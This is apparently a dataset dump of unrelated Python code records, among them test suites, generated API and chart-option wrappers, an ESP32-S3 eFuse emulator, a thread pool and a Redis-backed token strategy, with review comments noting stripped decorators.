code stringlengths 281 23.7M |
|---|
def load_corpus(name, download=True):
    """Load a previously downloaded text corpus.

    Args:
        name: key into the module-level ``corpora`` path registry.
        download: kept for backward compatibility; fetching is handled by
            the separate download.py module, not here.

    Returns:
        Bunch with ``categories`` (subdirectory names), ``files`` (file
        paths), ``data`` (file contents) and ``target`` (category per file).

    Raises:
        ValueError: if the corpus directory does not exist on disk.
    """
    path = corpora[name]
    if not os.path.exists(path):
        raise ValueError("'{}' dataset has not been downloaded, use the download.py module to fetch datasets".format(name))
    categories = [cat for cat in os.listdir(path) if os.path.isdir(os.path.join(path, cat))]
    files = []
    data = []
    target = []
    for cat in categories:
        cat_dir = os.path.join(path, cat)
        # BUG FIX: the original loop variable was ``name``, shadowing the
        # corpus-name parameter; use a distinct name and join the path once.
        for fname in os.listdir(cat_dir):
            fpath = os.path.join(cat_dir, fname)
            files.append(fpath)
            target.append(cat)
            with open(fpath, 'r') as f:
                data.append(f.read())
    return Bunch(categories=categories, files=files, data=data, target=target)
class nicira_controller_role_reply(nicira_header):
    """Generated OpenFlow message: Nicira controller-role reply (NXT_ROLE_REPLY)."""
    version = 1          # OpenFlow protocol version 1.0
    type = 4             # vendor/experimenter message type
    experimenter = 8992  # Nicira vendor id (0x2320)
    subtype = 11         # NXT_ROLE_REPLY subtype

    def __init__(self, xid=None, role=None):
        # xid: transaction id echoed from the request; role: NX_ROLE_* value
        # (defaults to 0, i.e. NX_ROLE_OTHER).
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (role != None):
            self.role = role
        else:
            self.role = 0
        return

    def pack(self):
        """Serialize the message; the 16-bit length field (index 2) is
        patched in after all parts have been packed."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # length placeholder
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!L', self.experimenter))
        packed.append(struct.pack('!L', self.subtype))
        packed.append(struct.pack('!L', self.role))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    def unpack(reader):
        # NOTE(review): no ``self`` parameter -- presumably decorated as
        # @staticmethod in the original generated source; confirm upstream.
        obj = nicira_controller_role_reply()
        _version = reader.read('!B')[0]
        assert (_version == 1)
        _type = reader.read('!B')[0]
        assert (_type == 4)
        _length = reader.read('!H')[0]
        orig_reader = reader
        # Constrain further reads to this message's payload (4 header bytes
        # were consumed before the length field applies).
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _experimenter = reader.read('!L')[0]
        assert (_experimenter == 8992)
        _subtype = reader.read('!L')[0]
        assert (_subtype == 11)
        obj.role = reader.read('!L')[0]
        return obj

    def __eq__(self, other):
        # Equality on the mutable fields only; class constants always match.
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.role != other.role):
            return False
        return True

    def pretty_print(self, q):
        """Render a human-readable dump through pretty-printer ``q``."""
        q.text('nicira_controller_role_reply {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('role = ')
                # Known NX role values get a symbolic name; others print hex.
                value_name_map = {0: 'NX_ROLE_OTHER', 1: 'NX_ROLE_MASTER', 2: 'NX_ROLE_SLAVE'}
                if (self.role in value_name_map):
                    q.text(('%s(%d)' % (value_name_map[self.role], self.role)))
                else:
                    q.text(('%#x' % self.role))
            q.breakable()
        q.text('}')
def does_file_need_fix(filepath: str) -> bool:
    """Return True if ``filepath`` needs its license header fixed.

    Only ``.py``/``.pyi`` files are considered.  Relies on the module-level
    ``license_header_lines`` (the expected header, in order) and
    ``lines_to_keep`` (lines that may legitimately precede the header,
    e.g. shebangs).
    """
    if (not re.search('\\.pyi?$', filepath)):
        return False
    with open(filepath, mode='r') as f:
        first_license_line = None
        # Skip permissible leading lines until the header should begin.
        for line in f:
            if (line == license_header_lines[0]):
                first_license_line = line
                break
            elif (line not in lines_to_keep):
                # Unexpected content before the header -> needs fixing.
                return True
        # Compare the header line by line; ``chain`` re-injects the first
        # header line already consumed above.  If EOF was reached without
        # finding the header, first_license_line is None and the very first
        # comparison fails, correctly reporting a fix is needed.
        for (header_line, line) in zip(license_header_lines, chain((first_license_line,), f)):
            if (line != header_line):
                return True
    return False
def extractDefiringCom(item):
    """Build a release message for a 'Defiring' feed item.

    Returns None for previews or items lacking both chapter and volume
    info, a release message when a known tag matches, and False otherwise.
    """
    title = item['title']
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
    if 'preview' in title.lower() or not (chp or vol):
        return None
    known_tags = (
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    )
    for tag, series_name, release_type in known_tags:
        if tag in item['tags']:
            return buildReleaseMessageWithType(item, series_name, vol, chp, frag=frag, postfix=postfix, tl_type=release_type)
    return False
class TestConsentVerify():
    """Endpoint tests for POST consent-request verification.

    NOTE(review): the bare ``(scope='function')``, ``.usefixtures(...)`` and
    ``('fides...')`` lines are truncated decorators -- presumably
    ``@pytest.fixture(scope='function')``, ``@pytest.mark.usefixtures(...)``
    and ``@mock.patch(...)`` respectively; confirm against the original
    source.
    """
    (scope='function')
    def verification_code(self) -> str:
        # Fixture: the identity-verification code cached for a request.
        return 'abcd'

    def test_consent_verify_no_consent_request_id(self, api_client):
        # Unknown consent request id -> 404.
        data = {'code': '12345'}
        response = api_client.post(f"{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id='non_existent_consent_id')}", json=data)
        assert (response.status_code == 404)
        assert ('not found' in response.json()['detail'])

    .usefixtures('subject_identity_verification_required')
    def test_consent_verify_no_consent_code(self, provided_identity_and_consent_request, api_client):
        # No code has been cached for the request -> treated as expired (400).
        data = {'code': '12345'}
        (_, consent_request) = provided_identity_and_consent_request
        response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json=data)
        assert (response.status_code == 400)
        assert ('code expired' in response.json()['detail'])

    .usefixtures('subject_identity_verification_required')
    def test_consent_verify_invalid_code(self, provided_identity_and_consent_request, api_client):
        # Wrong code -> 403.
        (_, consent_request) = provided_identity_and_consent_request
        consent_request.cache_identity_verification_code('abcd')
        response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': '1234'})
        assert (response.status_code == 403)
        assert ('Incorrect identification' in response.json()['detail'])

    .usefixtures('subject_identity_verification_required')
    ('fides.api.models.privacy_request.ConsentRequest.verify_identity')
    def test_consent_verify_no_email_provided(self, mock_verify_identity: MagicMock, db, api_client, verification_code):
        # Identity record exists but carries no email value -> 404.
        provided_identity_data = {'privacy_request_id': None, 'field_name': 'email', 'hashed_value': None, 'encrypted_value': None}
        provided_identity = ProvidedIdentity.create(db, data=provided_identity_data)
        consent_request_data = {'provided_identity_id': provided_identity.id}
        consent_request = ConsentRequest.create(db, data=consent_request_data)
        consent_request.cache_identity_verification_code(verification_code)
        response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': verification_code})
        assert (response.status_code == 404)
        assert (verification_code in mock_verify_identity.call_args_list[0].args)
        assert ('missing' in response.json()['detail'])

    .usefixtures('subject_identity_verification_required')
    ('fides.api.models.privacy_request.ConsentRequest.verify_identity')
    def test_consent_verify_no_consent_present(self, mock_verify_identity: MagicMock, provided_identity_and_consent_request, api_client, verification_code):
        # Correct code but no stored preferences -> 200 with null consent.
        (_, consent_request) = provided_identity_and_consent_request
        consent_request.cache_identity_verification_code(verification_code)
        response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': verification_code})
        assert (response.status_code == 200)
        assert (verification_code in mock_verify_identity.call_args_list[0].args)
        assert (response.json()['consent'] is None)

    .usefixtures('subject_identity_verification_required')
    ('fides.api.models.privacy_request.ConsentRequest.verify_identity')
    def test_consent_verify_consent_preferences(self, mock_verify_identity: MagicMock, provided_identity_and_consent_request, db, api_client, verification_code):
        # Stored preferences are echoed back with GPC bookkeeping fields added.
        (provided_identity, consent_request) = provided_identity_and_consent_request
        consent_request.cache_identity_verification_code(verification_code)
        consent_data: list[dict[(str, Any)]] = [{'data_use': 'email', 'data_use_description': None, 'opt_in': True}, {'data_use': 'location', 'data_use_description': 'Location data', 'opt_in': False}]
        for data in deepcopy(consent_data):
            data['provided_identity_id'] = provided_identity.id
            Consent.create(db, data=data)
        response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': verification_code})
        assert (response.status_code == 200)
        assert (verification_code in mock_verify_identity.call_args_list[0].args)
        expected_consent_data: list[dict[(str, Any)]] = [{'data_use': 'email', 'data_use_description': None, 'opt_in': True, 'has_gpc_flag': False, 'conflicts_with_gpc': False}, {'data_use': 'location', 'data_use_description': 'Location data', 'opt_in': False, 'has_gpc_flag': False, 'conflicts_with_gpc': False}]
        assert (response.json()['consent'] == expected_consent_data)

    .usefixtures('subject_identity_verification_required')
    def test_verify_consent_stores_verified_at(self, provided_identity_and_consent_request, db, api_client, verification_code):
        # Successful verification records identity_verified_at on the request.
        (provided_identity, consent_request) = provided_identity_and_consent_request
        consent_request.cache_identity_verification_code(verification_code)
        consent_data: list[dict[(str, Any)]] = [{'data_use': 'email', 'data_use_description': None, 'opt_in': True}, {'data_use': 'location', 'data_use_description': 'Location data', 'opt_in': False}]
        for data in deepcopy(consent_data):
            data['provided_identity_id'] = provided_identity.id
            Consent.create(db, data=data)
        response = api_client.post(f'{V1_URL_PREFIX}{CONSENT_REQUEST_VERIFY.format(consent_request_id=consent_request.id)}', json={'code': verification_code})
        assert (response.status_code == 200)
        expected_consent_data: list[dict[(str, Any)]] = [{'data_use': 'email', 'data_use_description': None, 'opt_in': True, 'has_gpc_flag': False, 'conflicts_with_gpc': False}, {'data_use': 'location', 'data_use_description': 'Location data', 'opt_in': False, 'has_gpc_flag': False, 'conflicts_with_gpc': False}]
        assert (response.json()['consent'] == expected_consent_data)
        db.refresh(consent_request)
        assert (consent_request.identity_verified_at is not None)
class TestDeletion(CustomTestCase):
    """DELETE endpoint tests: removing a queued task by its key."""
    uri = '/sleep'

    def create_app():
        # NOTE(review): missing ``self`` -- this hook conventionally takes
        # it; confirm against the original source.
        app.config['TESTING'] = True
        return app

    def test_delete__204(self):
        # Deleting an existing task by its returned key -> 204 No Content.
        r1 = self.client.post(self.uri, json={'args': ['10'], 'force_unique_key': True})
        r1_json = r1.get_json()
        self.assertStatus(r1, 202)
        r2 = self.client.delete(f"{self.uri}?key={r1_json['key']}")
        self.assertStatus(r2, 204)

    def test_delete__400(self):
        # Empty key parameter -> 400 Bad Request.
        r1 = self.client.post(self.uri, json={'args': ['10'], 'force_unique_key': True})
        self.assertStatus(r1, 202)
        r2 = self.client.delete(f'{self.uri}?key=')
        self.assertStatus(r2, 400)

    def test_delete__404(self):
        # Unknown key -> 404 Not Found.
        r1 = self.client.post(self.uri, json={'args': ['10'], 'force_unique_key': True})
        self.assertStatus(r1, 202)
        r2 = self.client.delete(f'{self.uri}?key=abcdefg')
        self.assertStatus(r2, 404)
def getTaskValueIndex(taskname, valuename):
    """Return 1-based (task index, value index) for a named task value.

    Searches the global ``Tasks`` list for an enabled task whose name equals
    ``taskname`` and, within it, looks up ``valuename`` among its value
    names.  Either index is -1 when not found.  The search stops at the
    first enabled matching task, even if its value index remains -1
    (preserving the original early-return behavior).
    """
    tid = -1
    vid = -1
    global Tasks
    for x, task in enumerate(Tasks):
        # Slots may hold placeholders (e.g. False); skip non-task entries.
        if not task or isinstance(task, bool):
            continue
        try:
            if task.enabled and task.gettaskname() == taskname:
                tid = x + 1
                for u in range(task.valuecount):
                    if task.valuenames[u] == valuename:
                        vid = u + 1
                return (tid, vid)
        except Exception:
            # Tolerate malformed task objects as before, but no longer
            # swallow KeyboardInterrupt/SystemExit via a bare except.
            pass
    return (tid, vid)
class TestCombineData(unittest.TestCase):
    """End-to-end test for combine_data_main: joins two probe-set tables
    through a cross-species probe-set lookup."""

    def setUp(self):
        # Species tables: probe-set id -> public accession (TSV with header).
        self.species1 = u'Probe_Set_ID\tPublic_ID\n1053_at\tM87338\n117_at\tX51757\n121_at\tX69699\n1255_g_at\tL36861\n'
        self.species2 = u'Probe_Set_ID\tPublic_ID\n1417503_at\tNM_020022\n1457638_x_at\tAV039064\n1457669_x_at\tAV096765\n1418208_at\tNM_011040\n1446561_at\tBB497767\n1421061_at\tNM_008189\n1426970_a_at\tAK004894\n1426971_at\tAK004894\n1437317_at\tBB735820\n'
        # Mapping: species-1 probe set -> comma-separated species-2 probe
        # sets ('NA' means no counterpart).
        self.lookup_data = u'ps_1\tgid_1\tgid_2\tps_2\n1053_at\t5982\t19718\t1417503_at,1457638_x_at,1457669_x_at\n117_at\t3310\tNA\tNA\n121_at\t7849\t18510\t1418208_at,1446561_at\n1255_g_at\t2978\t14913\t1421061_at\n1294_at\t7318\t74153\t1426970_a_at,1426971_at,1437317_at\n'
        # Each species-1 row extended with its mapped species-2 rows.
        self.expected_output = u'Probe_Set_ID\tPublic_ID\tProbe_Set_ID_1\tPublic_ID_1\tProbe_Set_ID_2\tPublic_ID_2\tProbe_Set_ID_3\tPublic_ID_3\n1053_at\tM87338\t1417503_at\tNM_020022\t1457638_x_at\tAV039064\t1457669_x_at\tAV096765\n117_at\tX51757\n121_at\tX69699\t1418208_at\tNM_011040\t1446561_at\tBB497767\n1255_g_at\tL36861\t1421061_at\tNM_008189\n'

    def test_combine_data(self):
        data1 = IndexedFile(fp=io.StringIO(self.species1), first_line_is_header=True)
        data2 = IndexedFile(fp=io.StringIO(self.species2), first_line_is_header=True)
        lookup = ProbeSetLookup(lookup_data_fp=io.StringIO(self.lookup_data))
        output_fp = io.StringIO()
        combine_data_main(data1, data2, lookup.lookup, output_fp)
        self.assertEqual(output_fp.getvalue(), self.expected_output)
class PageSettings(AbstractObject):
    """Generated Graph-API wrapper for a page-settings record."""

    def __init__(self, api=None):
        super(PageSettings, self).__init__()
        self._isPageSettings = True
        self._api = api

    class Field(AbstractObject.Field):
        # Wire-format field names for this object type.
        setting = 'setting'
        value = 'value'

    # Maps field name -> API type for (de)serialization.
    _field_types = {'setting': 'string', 'value': 'Object'}

    def _get_field_enum_info(cls):
        # NOTE(review): takes ``cls`` with no visible decorator -- presumably
        # @classmethod in the original generated source; confirm upstream.
        field_enum_info = {}
        return field_enum_info
class OptionSeriesBoxplotSonificationContexttracksMappingTremoloDepth(Options):
    """Generated Highcharts option wrapper:
    series.boxplot.sonification.contextTracks.mapping.tremolo.depth.

    NOTE(review): each name is defined twice (getter, then setter); without
    the original @property/@<name>.setter decorators the second definition
    shadows the first -- presumably decorators were stripped during
    extraction; confirm upstream.
    """
    def mapFunction(self):
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
class ExampleDirLanguages(BaseExampleDir):
    """Example directory tree of greeting files in several languages, with
    symlinked aliases and a 'countries' directory of links into it."""

    def __init__(self):
        BaseExampleDir.__init__(self)
        greetings = (
            ('hello', 'Hello!'),
            ('goodbye', 'Goodbye!'),
            ('spanish/hola', 'Hello!'),
            ('spanish/adios', 'Goodbye!'),
            ('welsh/north_wales/maen_ddrwg_gen_i', 'Sorry!'),
            ('welsh/south_wales/maen_flin_da_fi', 'Sorry!'),
            ('icelandic/takk_fyrir', 'Thank you!'),
        )
        for path, content in greetings:
            self.add_file(path, content)
        # Short aliases for the two English greetings.
        self.add_link('hi', 'hello')
        self.add_link('bye', 'goodbye')
        # Country-named links pointing back into the language directories.
        self.add_dir('countries')
        country_links = (
            ('countries/spain', '../spanish'),
            ('countries/north_wales', '../welsh/north_wales'),
            ('countries/south_wales', '../welsh/south_wales'),
            ('countries/iceland', '../icelandic'),
        )
        for link, target in country_links:
            self.add_link(link, target)
def test_sequential_cooling():
    """Cool an instanton stepwise from 400 K down to 100 K, re-seeding and
    re-optimizing it at each temperature."""
    calc_kwargs = {'scale': 0.01}
    geom = AnaPot().get_saddles(i=0, geom_kwargs={'coord_type': 'mwcartesian'}, calc_kwargs=calc_kwargs)
    calc = geom.calculator  # NOTE(review): unused here; kept as in original
    def calc_getter():
        # Fresh calculator instance for each instanton image.
        return AnaPot(**calc_kwargs)
    P = 20  # NOTE(review): presumably the number of instanton images; confirm
    T = 400
    # Temperature ladder from 400 K to 100 K in 10 steps.
    Ts = np.linspace(T, 100, num=10)
    inst = Instanton.from_ts(geom, P=P, calc_getter=calc_getter)
    init = list()  # coordinates before each optimization cycle
    fin = list()   # coordinates after each optimization cycle
    for (i, T) in enumerate(Ts):
        print(f' CYCLE {i}, T={T} K')
        # Re-seed from the previous temperature's converged instanton.
        inst = Instanton.from_instanton(inst, calc_getter=calc_getter, T=T)
        init.append(inst.coords.copy())
        opt = RSIRFOptimizer(inst, hessian_init='calc', hessian_recalc=5)
        opt.run()
        fin.append(inst.coords.copy())
class WMAP5BAOSNCosmology(FRWCosmology):
    """Cosmological parameters from the WMAP 5-year + BAO + SN combination."""

    _params = ('t0', 'sigma8', 'omegaB', 'omegaC', 'ns')

    t0 = 13.73
    t0_err = 0.12
    sigma8 = 0.817
    sigma8_err = 0.026
    ns = 0.96
    ns_err = (0.013, 0.014)  # asymmetric (lower, upper) uncertainty
    H0 = 70.1
    H0_err = 1.3
    omegaB = 0.046
    omegaB_err = 0.0015
    omegaC = 0.233
    omegaC_err = 0.013
    omegaL = 0.721
    omegaL_err = 0.015

    @property
    def omegaM(self):
        # Total matter density: baryons + cold dark matter.
        return self.omegaB + self.omegaC

    @property
    def omegaM_err(self):
        # Component uncertainties combined linearly, as originally defined.
        return self.omegaB_err + self.omegaC_err
def test_forwarded_quote_escaping(asgi):
    """Escaped quoted-pairs inside a Forwarded header are unescaped; a bare
    'for' address (no host= parameter) yields host None."""
    req = create_req(asgi, host='suchproxy02.suchtesting.com', path='/languages', root_path='doge', headers={'Forwarded': 'for="1\\.2\\.3\\.4";some="extra,\\"info\\""'})
    assert (req.forwarded[0].host is None)
    # Backslash escapes in the quoted value are removed when parsed.
    assert (req.forwarded[0].src == '1.2.3.4')
class TestANSIString(TestCase):
    """Tests for the ANSIString (AN) class: visible-length accounting,
    clean/raw forms, format padding and split/join behavior."""

    def setUp(self):
        # '|r', '|c', '|n' are color/reset markup codes in the raw form.
        self.example_raw = '|relectric |cboogaloo|n'
        self.example_ansi = AN(self.example_raw)
        self.example_str = 'electric boogaloo'
        # Markup expanded into actual ANSI escape sequences.
        self.example_output = '\x1b[1m\x1b[31melectric \x1b[1m\x1b[36mboogaloo\x1b[0m'

    def test_length(self):
        # Length counts visible characters only, not escape codes.
        self.assertEqual(len(self.example_ansi), 17)

    def test_clean(self):
        self.assertEqual(self.example_ansi.clean(), self.example_str)

    def test_raw(self):
        self.assertEqual(self.example_ansi.raw(), self.example_output)

    def test_format(self):
        # Padding applies to the visible width (17 -> 20 adds three fills).
        self.assertEqual(f'{self.example_ansi:0<20}', (self.example_output + '000'))

    def test_split_with_mixed_strings(self):
        # join/split must behave identically for AN and plain-str operands.
        anstr1 = AN('Line1\nLine2')
        anstr2 = AN('\n').join([AN('Line1'), AN('Line2')])
        anstr3 = AN('\n').join([AN('Line1'), 'Line2'])
        self.assertEqual(anstr2, anstr3)
        self.assertEqual(anstr1, anstr2)
        self.assertEqual(anstr1, anstr3)
        split1 = anstr1.split('\n')
        split2 = anstr2.split('\n')
        split3 = anstr3.split('\n')
        self.assertEqual(split2, split3, 'Split 2 and 3 differ')
        self.assertEqual(split1, split2, 'Split 1 and 2 differ')
        self.assertEqual(split1, split3, 'Split 1 and 3 differ')
class RightToolbar(Toolbar):
    """Toolbar variant docked in the shell's right sidebar."""
    ui = 'ui/coverart_rightsidebar.ui'  # glade/ui definition for this toolbar
    name = 'right'

    def hide(self):
        # Only detach from the shell if the widget is currently visible.
        if self.builder.get_visible():
            self.builder.hide()
            self.plugin.shell.remove_widget(self.builder, RB.ShellUILocation.RIGHT_SIDEBAR)

    def show(self):
        # Attach to the right sidebar without expanding/filling, then show.
        self.plugin.shell.add_widget(self.builder, RB.ShellUILocation.RIGHT_SIDEBAR, expand=False, fill=False)
        self.builder.show()
class ManualSchema(ViewInspector):
    """Schema inspector driven by an explicit, manually supplied field list."""

    def __init__(self, fields, description='', encoding=None):
        """
        Args:
            fields: list of ``coreapi.Field`` instances describing the link.
            description: free-form endpoint description.
            encoding: request encoding, if any.
        """
        super().__init__()
        if (coreapi is not None):
            # coreapi-based schema generation is deprecated in DRF.
            warnings.warn('CoreAPI compatibility is deprecated and will be removed in DRF 3.17', RemovedInDRF317Warning)
        assert all((isinstance(f, coreapi.Field) for f in fields)), '`fields` must be a list of coreapi.Field instances'
        self._fields = fields
        self._description = description
        self._encoding = encoding

    def get_link(self, path, method, base_url):
        """Return a ``coreapi.Link`` for ``path``/``method`` under ``base_url``."""
        if (base_url and path.startswith('/')):
            # urljoin would otherwise discard base_url's own path component.
            path = path[1:]
        return coreapi.Link(url=parse.urljoin(base_url, path), action=method.lower(), encoding=self._encoding, fields=self._fields, description=self._description)
# NOTE(review): the line below looks like a truncated decorator -- presumably
# ``@register.inclusion_tag(...)``; confirm against the original source.
_tag('django_social_share/templatetags/post_to_whatsapp.html', takes_context=True)
def post_to_whatsapp(context, obj_or_url=None, link_text='', link_class=''):
    """Template-tag context builder for a 'Post to WhatsApp' share link."""
    context = post_to_whatsapp_url(context, obj_or_url)
    context['link_class'] = link_class
    # Default label when no link text is supplied.
    context['link_text'] = (link_text or 'Post to WhatsApp')
    return context
def test_extract_seed_nodes() -> None:
    """A field marked as an identity becomes the traversal's seed node."""
    t = generate_graph_resources(3)
    # dr_1.ds_1.f1 references the matching field in dr_2 and dr_3, and
    # carries the identity key 'x'.
    field(t, 'dr_1', 'ds_1', 'f1').references.append((FieldAddress('dr_2', 'ds_2', 'f1'), None))
    field(t, 'dr_1', 'ds_1', 'f1').references.append((FieldAddress('dr_3', 'ds_3', 'f1'), None))
    field(t, 'dr_1', 'ds_1', 'f1').identity = 'x'
    graph: DatasetGraph = DatasetGraph(*t)
    assert (set(graph.nodes.keys()) == {CollectionAddress('dr_1', 'ds_1'), CollectionAddress('dr_2', 'ds_2'), CollectionAddress('dr_3', 'ds_3')})
    assert (graph.identity_keys == {FieldAddress('dr_1', 'ds_1', 'f1'): 'x'})
    assert (graph.edges == {BidirectionalEdge(FieldAddress('dr_1', 'ds_1', 'f1'), FieldAddress('dr_2', 'ds_2', 'f1')), BidirectionalEdge(FieldAddress('dr_1', 'ds_1', 'f1'), FieldAddress('dr_3', 'ds_3', 'f1'))})
    traversal = Traversal(graph, {'x': 1})
    # The traversal root feeds directly into the identity-bearing collection.
    assert (traversal.root_node.children.keys() == {CollectionAddress('dr_1', 'ds_1')})
class EmulateEfuseController(EmulateEfuseControllerBase):
    """In-memory emulation of the ESP32-S3 eFuse controller, for tests."""
    CHIP_NAME = 'ESP32-S3'
    mem = None      # backing storage, managed by the base class
    debug = False

    def __init__(self, efuse_file=None, debug=False):
        self.Blocks = EfuseDefineBlocks
        self.Fields = EfuseDefineFields()
        self.REGS = EfuseDefineRegisters
        super(EmulateEfuseController, self).__init__(efuse_file, debug)
        # Start with the command register idle.
        self.write_reg(self.REGS.EFUSE_CMD_REG, 0)

    ' esptool method start >>'

    def get_major_chip_version(self):
        return 0

    def get_minor_chip_version(self):
        return 2

    def get_crystal_freq(self):
        return 40  # NOTE(review): presumably MHz; confirm upstream

    def get_security_info(self):
        return {'flags': 0, 'flash_crypt_cnt': 0, 'key_purposes': 0, 'chip_id': 0, 'api_version': 0}

    ' << esptool method end '

    def handle_writing_event(self, addr, value):
        """React to a write on the command register: emulate program/read."""
        if (addr == self.REGS.EFUSE_CMD_REG):
            if (value & self.REGS.EFUSE_PGM_CMD):
                # Bits 2..5 of the command select the updated block.
                self.copy_blocks_wr_regs_to_rd_regs(updated_block=((value >> 2) & 15))
                self.clean_blocks_wr_regs()
                self.check_rd_protection_area()
                self.write_reg(addr, 0)
                self.write_reg(self.REGS.EFUSE_CMD_REG, 0)
            elif (value == self.REGS.EFUSE_READ_CMD):
                self.write_reg(addr, 0)
                self.write_reg(self.REGS.EFUSE_CMD_REG, 0)
                self.save_to_file()

    def get_bitlen_of_block(self, blk, wr=False):
        """Bit width of block ``blk``; write buffers differ from read size."""
        if (blk.id == 0):
            if wr:
                return (32 * 8)
            else:
                return (32 * blk.len)
        elif wr:
            # 8 data words plus 3 words of Reed-Solomon coding.
            rs_coding = (32 * 3)
            return ((32 * 8) + rs_coding)
        else:
            return (32 * blk.len)

    def handle_coding_scheme(self, blk, data):
        """Verify and strip the RS coding from a written block's bitstream."""
        if (blk.id != 0):
            coded_bytes = 12
            data.pos = (coded_bytes * 8)
            plain_data = data.readlist('32*uint:8')[::(- 1)]
            # Recompute the RS code over the payload and compare with what
            # was written; mismatch means corrupted coding data.
            rs = reedsolo.RSCodec(coded_bytes)
            calc_encoded_data = list(rs.encode([x for x in plain_data]))
            data.pos = 0
            if (calc_encoded_data != data.readlist('44*uint:8')[::(- 1)]):
                raise FatalError('Error in coding scheme data')
            data = data[(coded_bytes * 8):]
        if (blk.len < 8):
            # Trim unused words for blocks shorter than 8 words.
            data = data[((8 - blk.len) * 32):]
        return data
class NeverMatch(Field):
    """A field that rejects every value it is asked to validate."""

    errors = {'never': 'This never validates.'}

    def __init__(self, **kwargs: typing.Any) -> None:
        # This field has no notion of null, so the option must not be passed.
        assert 'allow_null' not in kwargs
        super().__init__(**kwargs)

    def validate(self, value: typing.Any) -> typing.Any:
        # Unconditionally fail with the 'never' error message.
        raise self.validation_error('never')
class SoftThreadPool():
    """Lazily started thread pool over a shared queue/condition pair.

    Worker threads (``SoftThread``) pop callables off ``_queue``; ``None``
    acts as a per-worker shutdown sentinel.
    """
    def __init__(self, nthreads=4):
        self._nthreads = nthreads
        self._queue = []                         # pending Futures / sentinels
        self._condition = threading.Condition()  # guards queue hand-off
        self._active = False                     # True once workers started
        self._lock = threading.RLock()           # guards pool state
        self._error = None                       # deferred error for __call__

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # NOTE(review): stores exc_type (the exception CLASS, not the
        # instance) as the pool error; __call__ will then ``raise`` that
        # class.  Confirm whether exc_val was intended.
        self.shutdown(exc_type)

    def start(self):
        """Spin up the worker threads on the shared queue/condition."""
        with self._lock:
            self._active = True
            for _ in range(self._nthreads):
                SoftThread(self._queue, self._condition).start()

    def shutdown(self, error=None):
        """Queue one shutdown sentinel per worker and deactivate the pool."""
        with self._lock:
            if (not self._active):
                return
        for _ in range(self._nthreads):
            with self._condition:
                self._queue.append(None)
                self._condition.notify_all()
        with self._lock:
            self._active = False
            self._error = error

    def submit(self, func, *args, **kwargs):
        """Enqueue ``func(*args, **kwargs)``; starts the pool on first use.

        Returns the queued ``Future``.
        """
        with self._lock:
            if (not self._active):
                self.start()
        with self._condition:
            s = Future(func, args, kwargs)
            self._queue.append(s)
            self._condition.notify_all()
        return s

    def __call__(self):
        # Re-raise any error recorded at shutdown time.
        with self._lock:
            if self._error:
                raise self._error
class RedisStrategy(Strategy[(models.UP, models.ID)], Generic[(models.UP, models.ID)]):
    """Authentication strategy storing opaque tokens in Redis.

    Keys are ``{key_prefix}{token}``; values are the stringified user id.
    """
    def __init__(self, redis: redis.asyncio.Redis, lifetime_seconds: Optional[int]=None, *, key_prefix: str='fastapi_users_token:'):
        self.redis = redis
        self.lifetime_seconds = lifetime_seconds  # None -> tokens never expire
        self.key_prefix = key_prefix

    async def read_token(self, token: Optional[str], user_manager: BaseUserManager[(models.UP, models.ID)]) -> Optional[models.UP]:
        """Resolve ``token`` to a user, or None if absent/unknown/invalid."""
        if (token is None):
            return None
        user_id = (await self.redis.get(f'{self.key_prefix}{token}'))
        if (user_id is None):
            return None
        try:
            parsed_id = user_manager.parse_id(user_id)
            return (await user_manager.get(parsed_id))
        except (exceptions.UserNotExists, exceptions.InvalidID):
            # Stale or malformed entry: treat as unauthenticated.
            return None

    async def write_token(self, user: models.UP) -> str:
        """Create and persist a fresh token for ``user``; returns the token."""
        token = secrets.token_urlsafe()
        (await self.redis.set(f'{self.key_prefix}{token}', str(user.id), ex=self.lifetime_seconds))
        return token

    async def destroy_token(self, token: str, user: models.UP) -> None:
        """Invalidate ``token``; the ``user`` argument is unused here."""
        (await self.redis.delete(f'{self.key_prefix}{token}'))
def complete(service, task_token, return_value: object) -> Optional[Exception]:
    """Report an activity task as completed to the workflow service.

    Args:
        service: WorkflowService client used to send the response.
        task_token: opaque token identifying the activity task.
        return_value: activity result, JSON-serialized into the response.

    Returns:
        The service-reported error, or None on success.
    """
    respond = RespondActivityTaskCompletedRequest()
    respond.task_token = task_token
    respond.result = json.dumps(return_value)
    respond.identity = WorkflowService.get_identity()
    (_, error) = service.respond_activity_task_completed(respond)
    return error
def test_des_not_too_slowed_down():
    """Regression guard: DES on uint32 input must stay within 1.5x the
    uint8 timing on the same workload."""
    n = 10000
    data_u8 = np.zeros((n, 8), dtype='uint8')
    data_u32 = np.zeros((n, 8), dtype='uint32')
